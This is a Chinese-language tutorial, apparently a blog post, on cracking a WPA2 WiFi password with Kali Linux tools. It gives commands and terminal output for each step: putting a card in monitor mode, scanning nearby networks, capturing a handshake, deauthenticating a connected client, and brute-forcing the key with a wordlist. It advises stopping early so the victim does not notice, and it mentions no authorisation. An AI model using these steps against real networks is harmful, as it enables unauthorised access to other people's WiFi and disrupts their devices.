kali破解WiFi密码
- 查看可用的无线网卡名称
airmon-ng
┌──(root💀kali)-[~]
└─# airmon-ng
PHY Interface Driver Chipset
phy0 wlan0 iwlwifi Intel Corporation Wi-Fi 6 AX200 (rev 1a)
- 开启网卡监听模式
airmon-ng start wlan0
┌──(root💀kali)-[~]
└─# airmon-ng start wlan0
Found 2 processes that could cause trouble.
Kill them using 'airmon-ng check kill' before putting
the card in monitor mode, they will interfere by changing channels
and sometimes putting the interface back in managed mode
PID Name
518 NetworkManager
698 wpa_supplicant
PHY Interface Driver Chipset
phy0 wlan0 iwlwifi Intel Corporation Wi-Fi 6 AX200 (rev 1a)
(mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
(mac80211 station mode vif disabled for [phy0]wlan0)
- 输入
iwconfig
查看网卡信息,wlan0mon网卡名加了mon则表示打开监听模式成功
┌──(root💀kali)-[~]
└─# iwconfig
lo no wireless extensions.
eth0 no wireless extensions.
wlan0mon IEEE 802.11 Mode:Monitor Frequency:2.457 GHz Tx-Power=-2147483648 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Power Management:on
- 输入
airodump-ng wlan0mon
扫描WiFi,扫描到目标WiFi后按ctrl+c结束扫描
┌──(root💀kali)-[~]
└─# airodump-ng wlan0mon
CH 6 ][ Elapsed: 6 s ][ 2021-04-23 14:21
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
AA:AA:99:CC:2D:C6 -85 2 0 0 11 270 WPA2 CCMP PSK LIN
AA:AA:8C:D2:76:A9 -29 9 0 0 6 180 WPA2 CCMP PSK Huawei
AA:AA:1D:04:29:3B -42 12 0 0 6 540 WPA2 CCMP PSK BoyNextDoor
AA:AA:FC:3C:D1:66 -44 8 11 0 1 270 WPA2 CCMP PSK 2806
字段 | 释义 |
---|---|
BSSID | 目标WiFi的MAC地址 |
PWR | 目标WiFi的信号强弱,数值越小越强 |
#DATA | 数据量,数值越大使用的人数就越多 |
CH | WiFi信道 |
ESSID | WiFi名称 |
- 开始抓包
输入命令airodump-ng --bssid BSSID -c 信道频率 -w 抓包存储的路径 wlan0mon
进行抓包,当终端出现WPA handshake:
字段时表示抓包成功,可以直接按ctrl+c结束抓包同时也结束对终端的攻击以免对方掉线无法连接被发觉
┌──(root💀kali)-[~]
└─# airodump-ng --bssid AA:AA:8C:D2:76:A9 -c 6 -w /home/kali/Desktop/package wlan0mon 1 ⨯
14:25:39 Created capture file "/home/kali/Desktop/package-01.cap".
==抓包成功标志==
CH 6 ][ Elapsed: 10 mins ][ 2021-04-23 14:35 ][ WPA handshake: AA:AA:8C:D2:76:A9
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
==wifi的物理地址==
AA:AA:8C:D2:76:A9 -25 100 5840 1882 0 6 180 WPA2 CCMP PSK Huawei
BSSID STATION PWR Rate Lost Frames Notes Probes
==wifi的物理地址== ==终端的物理地址==
AA:AA:8C:D2:76:A9 AA:AA:E9:78:97:D3 -18 1e- 1e 4844 10655 EAPOL Huawei
Quitting...
- 在抓包时需要新开启一个终端,输入
airepaly-ng -0 20 -c 连接WiFi的终端mac地址 -a bssid(wifi的mac地址) wlan0mon
随机攻击连接目标wifi的一台终端使其下线重连进行tcp三次握手,我方伪装成WiFi热点获取到数据包
┌──(root💀kali)-[~]
└─# aireplay-ng -0 20 -a AA:AA:8C:D2:76:A9 -c AA:AA:E9:78:97:D3 wlan0mon
14:39:57 Waiting for beacon frame (BSSID: 24:6F:8C:D2:76:A9) on channel 6
14:39:57 Sending 64 directed DeAuth (code 7). STMAC: [AA:AA:E9:78:97:D3] [22|226 ACKs]
14:39:58 Sending 64 directed DeAuth (code 7). STMAC: [AA:AA:E9:78:97:D3] [ 0|300 ACKs]
14:39:59 Sending 64 directed DeAuth (code 7). STMAC: [AA:AA:E9:78:97:D3] [ 0|300 ACKs]
14:40:00 Sending 64 directed DeAuth (code 7). STMAC: [AA:AA:E9:78:97:D3] [ 0|598 ACKs]
14:4^C00 Sending 64 directed DeAuth (code 7). STMAC: [AA:AA:E9:78:97:D3] [ 0|163 ACKs]
- 抓包完成后关闭网卡监听模式
airmon-ng stop wlan0mon
- 进行密码爆破
输入aircrack-ng -w 字典路径 握手包路径
开使爆破
┌──(root💀kali)-[~]
└─# aircrack-ng -w /home/kali/Desktop/wordlists/rockyou.txt /home/kali/Desktop/*.cap
Reading packets, please wait...
Opening /home/kali/Desktop/package-01.cap
Read 103829 packets.
# BSSID ESSID Encryption
1 AA:AA:8C:D2:76:A9 Huawei WPA (1 handshake)
Choosing first network as target.
Reading packets, please wait...
Opening /home/kali/Desktop/package-01.cap
Read 103829 packets.
1 potential targets
Aircrack-ng 1.6
[00:00:00] 119/10303727 keys tested (2500.73 k/s)
Time left: 1 hour, 8 minutes, 41 seconds 0.00%
KEY FOUND! [ 12345678 ]【这个就是密码】
Master Key : 32 68 BE DA 0E 67 5D 2D 22 D0 B8 65 44 0B BB 61
08 F9 58 57 44 3C B6 1B EC F7 88 21 25 A6 BC 79
Transient Key : EA 80 60 7A 52 D2 94 C0 20 96 FE 8B 00 D7 80 F9
74 A6 DC 22 94 97 C8 33 8B 0A C6 C9 17 99 AC A9
93 C0 7A 2D D5 A3 B2 C1 D7 D9 BD 55 D1 31 20 E5
4F BE 50 E6 E0 B0 A3 4C 1B 83 BC B3 AE 00 00 00
EAPOL HMAC : E0 69 F2 EB 1C 23 37 C1 38 53 8E 06 BA 98 89 12
Q:如何获取rockyou.txt字典
A:kali系统自带了rockyou.txt字典在/usr/share/wordlists
目录下